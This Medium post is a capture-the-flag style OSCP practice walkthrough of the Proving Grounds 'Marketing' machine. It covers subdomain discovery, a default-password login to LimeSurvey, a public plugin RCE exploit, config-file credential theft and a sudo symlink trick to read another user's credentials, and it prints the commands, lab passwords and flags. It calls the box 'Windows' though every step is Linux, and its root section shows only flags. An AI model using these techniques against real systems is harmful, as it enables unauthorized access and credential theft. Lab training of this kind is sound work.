Open in app

Sign in

Write

Sign in

[OSCP Practice Series 32] Proving Grounds — Marketing

Ardian Danny
5 min readJan 10, 2024

--

Machine Type: Windows

Initial

Nmap discovered that port 22 and port 80 are open. I added the ‘marketing.pg’ domain to the /etc/hosts file, and now, let’s proceed.

Port 80 seems like a static landing page.

There’s directory listing.

I decided to run Dirbuster for a while. Dirbuster discovered common files and directories like assets, vendor, etc. But there’s this one directory I’ve never seen before, which is ‘/old.’

When I visit it, it is the same as the page before.

After checking for a while, it turns out there’s a clue for us in the source file.

We got a subdomain. I tried to brute-force the subdomain previously, but found nothing. Perhaps we can’t brute-force it because it has an uncommon name.

Let’s add it to our hosts file and continue.

Foothold

A LimeSurvey site. We have a potential user with the email admin@marketing.pg. There’s no navigation, but there is a /admin directory.

We know there’s potentially a user called ‘admin.’ Let’s try to guess the credentials. Okay, admin:password works!

We got the LimeSurvey version as well now.

Oh nice, there’s an exploit available https://github.com/Y1LD1R1M-1337/Limesurvey-RCE.

I followed the steps on the GitHub page, updated the php-rev.php file, uploaded and installed the plugin, activated it, and opened it. Surely, I got a shell.

There’s two users, m.sander and t.miller.

Getting User

There’s a MySQL running. Which means that usually there’s a config file containing database credentials that we can access.

I googled the LimeSurvey config file location.

Indeed, it is under /application/config/config.php.

We got the database credentials.

'username' => 'limesurvey_user',
'password' => 'EzPwz2022_dev1$$23!!',

No new info on the database. Perhaps we can use the database password to escalate our privileges.

Indeed we can get to t.miller using the database password.

Getting Second User

We can run /usr/bin/sync.sh as m.sander.

The script is just updating /home/m.sander/personal/notes.txt if there’s any difference. However, the thing is, it will display the difference as well. What if we created a random file and linked it to a file that only m.sander could read, then ran the sync.sh? Then it will show the difference, right? And because of that, we can see the content.

The issue is we don’t know which important file only m.sander can read.

Yap we don’t know.

After a while looking, I got a clue that we need to look at our groups.

We are belonging to the mlocate group.

find / -group mlocate 2>/dev/null | grep -v '^/proc\|^/run\|^/sys\|^/snap'

There’s mlocate.db. Lots of things inside it. I still cannot get a thing. I decided to get more clues; it turns out there’s a file name inside the mlocate.db file called creds-for-2022.txt, which is located inside /home/m.sander/personal.
Jeez, how are we even going to know that.

Okay, so I created a symlink to that file and ran the sync.sh again in the hope of getting the difference.

ln -sf /home/m.sander/personal/creds-for-2022.txt fk_this_box
sudo -u m.sander /usr/bin/sync.sh fk_this_box

We got the difference and we got a credentials.

m.sander: pa$$word@123$$4!!
m.sander: EzPwz2022_dev1$$23!!
m.sander: EzPwz2022_12345678#!

Use the credentials to SSH to m.sander’s account. The third one worked.

Getting Root

local.txt: eca1ceedd69ffd9e28f1c27e2142321b
proof.txt: bdbf2746346fe7f3bee907e0c1cee966

Learned

  • Enumerate EVERYTHING, look through everything, and every little possibilities, even web source-code.
  • Look through unusual groups.
Oscp Preparation

--

--

Ardian Danny

Written by Ardian Danny

151 Followers

Penetration Tester, Ethical Hacker, CTF Player, and a Cat Lover. My first account got disabled by Medium, but it won’t stop me from sharing the things I love.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams